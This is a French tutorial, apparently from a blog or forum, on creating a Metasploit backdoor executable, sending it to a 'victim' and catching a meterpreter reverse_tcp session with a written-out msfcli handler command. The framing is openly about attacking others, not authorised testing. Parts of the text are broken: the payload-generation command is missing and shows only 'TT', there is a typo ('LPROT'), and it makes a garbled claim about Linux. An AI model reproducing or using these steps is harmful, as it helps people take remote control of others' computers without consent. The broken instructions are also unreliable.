Créer un backdoor avec Metasploit

Sebdelkil vous avait déjà présenter un tuto sur Metasploit, Metasploit est une plate-forme Open Source de tests d'intrusion embarquant des fonctionnalités d'automatisation d'exploitation de failles et de création d'exploits.
Outil de prédilection pour nombre d'experts en sécurité, il intègre une base d'exploits (plus d'une centaine). La version 3 du framework, développée en Ruby, apporte notamment une interface Web, de codes d'exploitation pour réseau Wi-Fi ou encore la possibilité de lancer simultanément plusieurs exploits.
Des alternatives commerciales comme Canvas et Core Impact existent également.
Dans ce tuto, je vais vous montrer comment "les pirates" créer des \backdoor/ avec Metasploit sous Backtrack.

Requis:
-Backtrack 5 ( Pas forcement, mais je le fait sur backtrack )
-Metasploit ( Obligatoire ! )

C'est bon, on commence :

1.) Ouvrer le terminal en root



2.) Ensuite taper cette commande :

NOTE: Remplacer LHOST par votre IP a vous et le port vous pouvez le laisser par defaults ou le changer comme vous le souhaiter
TT


Maintenant a ceux stade vous devriez voir sur votre Bureau un "server.exe".
Maintenant vous n'avez plus qu'as l'envoyer a votre victime , vous remarquer qu'il a creer un .exe , donc c'est
reserver au systeme linux . (Quelle encul** ce linux )

3.)Maintenant assurez vous que votre victime est bien ouvert le RAT et entrer cette commande :

msfcli exploit/multi/handler payload=windows/meterpreter/reverse_tcp LHOST=192.168.2.12 LPROT=4444 E

NOTE : N'oubliez pas remplacer l'ip par la votre et le port par celui que vous avez mis plus haut !!



Maintenant metasploit vas chercher a se connecter sur le pc de la victime !



Maintenant , une fois que vous êtes connecter a la victime vous devriez voir ceci :



Bien joué ! maintenant vous etes connecter a votre victime !

4.) Met que dois je faire après ?
Maintenant vous pouvez utiliser une "floppé" de commande pour vous ammusez avec votre victime !